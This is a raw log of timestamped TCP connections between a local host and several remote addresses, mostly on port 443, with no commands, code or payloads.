Nov 9, 2024 02:47:31.143028975 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.143035889 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.143975973 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.143987894 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.144984961 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.144996881 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.145945072 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.145970106 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.146064997 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.146446943 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.146460056 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.146790981 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.146800041 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.146868944 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.147097111 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.147102118 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.288717031 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.291752100 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.291763067 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.292154074 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.292471886 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.292485952 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.292865992 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.292941093 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.293504000 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.294019938 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.295829058 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.295829058 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.295901060 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.296097994 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.296199083 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.299180031 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.299185991 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.304296970 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.304650068 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.304661036 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.305690050 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.305865049 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.307626963 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.307626963 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.307689905 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.383811951 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.383816957 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.383820057 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.383830070 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.383838892 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.427597046 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.430521011 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.430597067 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.430625916 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.430828094 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.435507059 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.437561035 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.437566996 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.437582970 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.437585115 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.437611103 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.439150095 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.439161062 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.637392044 CET	52994	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.637398958 CET	52995	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.637415886 CET	443	52994	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.637429953 CET	443	52995	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.637569904 CET	52994	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.637584925 CET	52995	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.638336897 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:31.638406992 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:31.638505936 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:31.639688969 CET	52994	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.639700890 CET	443	52994	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.639719009 CET	52995	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.639733076 CET	443	52995	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.724004030 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:31.724144936 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:31.796437025 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:31.797427893 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:31.797445059 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:31.803703070 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:31.803704023 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:31.803719997 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:31.803734064 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:31.873521090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:31.874349117 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:31.884893894 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.886096001 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.886121035 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.887942076 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.887948036 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.888454914 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.888926983 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.888940096 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.889352083 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.889358044 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.893363953 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.894167900 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.894633055 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.894644976 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.895159006 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.895163059 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.895339012 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.895370960 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.895385981 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.895994902 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.895994902 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.896012068 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.896019936 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.896421909 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.896426916 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.942785978 CET	52997	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.942820072 CET	443	52997	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.943145037 CET	52998	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943170071 CET	443	52998	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.943202972 CET	52997	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943332911 CET	52998	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943574905 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943586111 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943589926 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.943597078 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.943650007 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943653107 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943860054 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.943876982 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.944299936 CET	52997	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944302082 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944309950 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.944312096 CET	443	52997	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.944341898 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944447994 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944745064 CET	52998	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944761038 CET	443	52998	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.944967031 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944967985 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.944979906 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.944986105 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.945334911 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.945346117 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:31.945581913 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:31.945590019 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.010685921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:32.013946056 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.014003992 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.014076948 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.014569998 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.014569998 CET	52989	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.014584064 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.014591932 CET	443	52989	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.015583038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:32.018177032 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.018193960 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.018404007 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.018829107 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.018842936 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.024123907 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.024197102 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.025012016 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.025100946 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.025134087 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.025134087 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.025149107 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.025155067 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.025161982 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.026315928 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.026371002 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.026705980 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.026885986 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.026891947 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.026956081 CET	52990	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.026961088 CET	443	52990	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.028511047 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.028511047 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.028522968 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.028532028 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.030684948 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.031089067 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.031723976 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.031723976 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.031740904 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.031824112 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.032679081 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.032713890 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.032790899 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.033406019 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.033409119 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.033410072 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.033423901 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.034821987 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.034832954 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.036735058 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.036741972 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.036845922 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.038115025 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.038131952 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.038233042 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.038492918 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.038495064 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.038502932 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.038513899 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.251384020 CET	443	52994	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.251611948 CET	52994	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.251622915 CET	443	52994	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.252031088 CET	443	52994	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.253067970 CET	52994	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.253144026 CET	443	52994	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.267064095 CET	443	52995	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.267519951 CET	52995	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.267533064 CET	443	52995	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.268378019 CET	443	52995	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.268685102 CET	52995	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.268786907 CET	443	52995	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.352047920 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.352066040 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.352432966 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.354548931 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.354602098 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.354659081 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.377269983 CET	53008	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377284050 CET	443	53008	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.377429008 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377449989 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.377475023 CET	53008	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377510071 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377563000 CET	53010	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377571106 CET	443	53010	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.377722025 CET	53010	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377983093 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.377995014 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.378123045 CET	53008	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.378134012 CET	443	53008	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.378711939 CET	53010	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.378721952 CET	443	53010	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.379754066 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.379760981 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.379905939 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.380094051 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.380103111 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.384565115 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:32.384591103 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:32.384718895 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:32.385057926 CET	52994	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.385099888 CET	52995	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.386082888 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:32.386096954 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:32.393382072 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:32.393403053 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:32.393470049 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:32.393671036 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:32.393681049 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:32.441616058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:32.441732883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:32.545686007 CET	443	52998	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.546168089 CET	52998	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.546179056 CET	443	52998	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.546526909 CET	443	52998	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.547564030 CET	52998	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.547631979 CET	443	52998	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.550070047 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.550306082 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.550316095 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.550868988 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.551331043 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.551343918 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.551446915 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.551517963 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.551806927 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.551879883 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.552428007 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.552493095 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.552805901 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.552866936 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.560257912 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.560525894 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.560544014 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.561633110 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.561700106 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.562088013 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.562146902 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.649651051 CET	52998	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.649838924 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.649848938 CET	443	52999	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.706621885 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.755450964 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.756093025 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.756113052 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.756638050 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.756644011 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.759341002 CET	443	53000	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.759341955 CET	443	53001	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.759427071 CET	53000	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.759455919 CET	53001	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.761862040 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.762296915 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.762305975 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.762799978 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.762805939 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.763191938 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.763603926 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.763618946 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.764035940 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.764039993 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.766699076 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.767533064 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.767551899 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.768066883 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.768071890 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.768826962 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.769238949 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.769258976 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.769898891 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.769903898 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.771617889 CET	52999	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.774781942 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.774790049 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.790849924 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.791080952 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.791135073 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.791620970 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.791630030 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:32.791650057 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:32.884531021 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.884587049 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.884699106 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.892648935 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.892963886 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.893014908 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.898777962 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.898802042 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.898865938 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.898886919 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.898917913 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.901819944 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.902405024 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:32.902458906 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:32.932044983 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.933255911 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.933274031 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.933512926 CET	443	52997	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.934323072 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.934380054 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.934712887 CET	52997	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.934726954 CET	443	52997	172.64.41.3	192.168.2.7
